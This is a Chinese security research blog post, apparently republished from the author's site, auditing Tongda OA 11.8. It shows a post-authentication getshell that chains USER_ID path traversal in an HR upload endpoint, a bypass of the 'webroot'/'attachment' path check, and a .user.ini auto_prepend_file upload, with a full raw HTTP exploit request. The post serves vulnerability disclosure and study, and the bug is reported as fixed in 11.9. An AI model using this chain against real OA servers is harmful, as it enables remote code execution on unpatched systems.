前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >通达OA代码审计篇二 - 11.8 后台Getshell

通达OA代码审计篇二 - 11.8 后台Getshell

作者头像
LoRexxar
发布2023-02-21 21:20:54
2K0
发布2023-02-21 21:20:54
举报
文章被收录于专栏:LoRexxar's Blog

前篇:通达OA代码审计篇 - 11.7 有条件的任意命令执行

前篇中提到的漏洞在11.8版本中被完全修复后,我痛定思痛,从头开始找一个新的漏洞,于是就有了今天这个漏洞的诞生,但没想到的是,在保留到2021年初时,1月11号更新的11.9版本中再次被定向修复。

今天我们也来看看这一次的漏洞逻辑~

在绕过之前

在提到漏洞之前,首先我们需要清楚通达OA的几个关键机制。

首先是通用文件,整个OA的大部分文件都会引用inc/utility*多个文件,里面涉及到了所有OA的通用函数以及一些全局处理、配置文件等。

除了关注到一些过滤函数以外,还有一个比较重要的是在inc/common.inc.php的全局处理,并将全局变量对应赋值给对应变量名。

而这个文件被多个基础文件引用,所以我们就有了一个自带的全局变量覆盖,但是是经过过滤的。

可以明确的是,这个问题作为顽疾深深埋在了通达OA的深处,11.7以后的漏洞也大多都是因为这个原因造成的。

除了这个以外,在前一篇文章我提到过,通达OA关于文件上传相关的配置非常完善。首先是建了attachment作为附件目录,正常的文件上传都会传到这里。

代码语言:javascript
复制
location /attachment {
    deny all;
}

除此之外,上传函数还有3个限制条件:

1、不能没有.

2、不能.之后为空

3、.之后3个字符不能是PHP

且通达本身不解析特殊后缀如pht,phtml等…

换言之,也就是如果一切文件上传都建立在通达OA本身的逻辑上,我们一定没办法只靠文件上传一个漏洞来getshell,在前篇中,我利用了一个文件包含来引用上传的文件。但是在11.8中这个漏洞被修复了,我们就需要找别的办法。

这里我们绕过的思路主要有几个:

1、文件包含+文件上传

可惜,11.8开始,所有涉及到文件包含的接口都做了详细的限制,这样的接口本来也没有几个。

2、文件改名+跨目录文件上传

3、上传一个特殊的配置文件,比如.user.ini

建立在这样的思路基础上,我们挖掘了今天这个漏洞。

后台Getshell

这里我们找到

代码语言:javascript
复制
/general/hr/manage/staff_info/update.php line 28

根据前面的基础,可以清楚这里USERID可控,然后刚好USERID被拼接进去,熟悉的漏洞诞生了,通过设置USERID为../../../,我们可以将文件上传到任意位置。

但同样的问题还是存在,我们没办法上传PHP文件,而且比起11.7,这里的上传限制也有一定的改变。添加了一个新的限制

代码语言:javascript
复制
function td_path_valid($source, $func_name)
{
    $source_arr = pathinfo($source);
    $source = realpath($source_arr["dirname"]);
    $basename = strtolower($source_arr["basename"]);
    if ($source === false) {
        return false;
    }
    if ($func_name == "td_fopen") {
		$whitelist = "qqwry.dat,tech.dat,tech_cloud.dat,tech_neucloud.dat,";
		if ((strpos($source, "webroot\inc") !== false) && find_id($whitelist, $basename)) {
            return true;
        }
    }
    if ((strpos($source, "webroot") !== false) && (strpos($source, "attachment") === false)) {
        return false;
    }
    else {
        return true;
    }
}

这里多了一条限制if ((strpos(source, "webroot") !== false) && (strpos(

我们需要找到一个同时满足webroot和attachment的目录即可,这里我们选用了

代码语言:javascript
复制
webroot\general\reportshop\workshop\report\attachment-remark

这里我们构造文件向

代码语言:javascript
复制
/general/hr/manage/staff_info/update.php?USER_ID=../../general\reportshop\workshop\report\attachment-remark/1

上传t.txt,这里就会成功写入一个1.txt文件。

在这个基础上,我们通过上传.user.ini来修改当前目录的配置。

具体原理可以参考https://www.leavesongs.com/PENETRATION/php-user-ini-backdoor.html

代码语言:javascript
复制
POST /general/hr/manage/staff_info/update.php?USER_ID=../../general\reportshop\workshop\report\attachment-remark/.user HTTP/1.1
Host: localhost:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------17518323986548992951984057104
Content-Length: 367
Connection: close
Cookie: PHPSESSID=76vrueivunkeingvpcv7cs4uu3; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=a4c45fc7; KEY_RANDOMDATA=7645
Upgrade-Insecure-Requests: 1

-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="ATTACHMENT"; filename="ttttttt.ini"
Content-Type: text/plain

auto_prepend_file=1.log
-----------------------------17518323986548992951984057104
Content-Disposition: form-data; name="submit"

提交
-----------------------------17518323986548992951984057104--

上传成功之后,上传1.log在目录下,然后请求该路径下任意php文件即可

值得注意的是,修改.user.ini并不是即时生效的,一般来说等待一会儿即可。

比较有意思的修复逻辑也很针对

直接对userid做了过滤。

漏洞证明

写在最后

这个漏洞是在前篇文章被修复之后挖掘的,可以算是相对比较隐蔽的漏洞吧,可惜没想到在手里还没过3个月就又被修复了,其实这个漏洞还是有配合的前台绕过方式的,但是由于时期特殊就不公开了,比较可惜的是在11.9中这些漏洞都被修复了。不得不说这几个版本通达的代码风格变化很大,虽然还是免不了挖东墙补西墙的感觉,但一些比较致命的问题都做了限制,后续如果还想挖通达的漏洞就比较难了,希望还能有更好的思路公开出来吧~

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021/03/09,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 在绕过之前
  • 后台Getshell
  • 漏洞证明
  • 写在最后
相关产品与服务
代码审计
代码审计(Code Audit,CA)提供通过自动化分析工具和人工审查的组合审计方式,对程序源代码逐条进行检查、分析,发现其中的错误信息、安全隐患和规范性缺陷问题,以及由这些问题引发的安全漏洞,提供代码修订措施和建议。支持脚本类语言源码以及有内存控制类源码。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档